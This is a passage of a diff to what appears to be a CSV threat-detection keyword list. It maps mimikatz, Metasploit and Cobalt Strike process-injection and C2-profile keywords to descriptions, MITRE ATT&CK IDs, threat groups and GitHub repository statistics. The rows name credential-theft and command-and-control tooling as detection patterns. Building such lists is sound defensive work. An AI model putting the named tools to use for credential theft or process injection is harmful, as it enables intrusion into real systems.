tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::run*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::runp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::start*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::stop*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::suspend*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process_herpaderping*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*process_imports.cna*","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","10","10","80","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" "*process_imports.x64*","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","10","10","80","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" "*process_imports_api *.exe*","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","0","N/A","10","10","80","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" -"*process_inject_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*process_inject_bof_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*process_inject_bof_reuse_memory*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*process_inject_execute*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*process_inject_min_alloc*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*process_inject_startrwx*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_bof_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_bof_reuse_memory*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_execute*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_min_alloc*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_startrwx*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*Process_Inject_Struct*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" -"*process_inject_transform_x*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*process_inject_userwx*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - 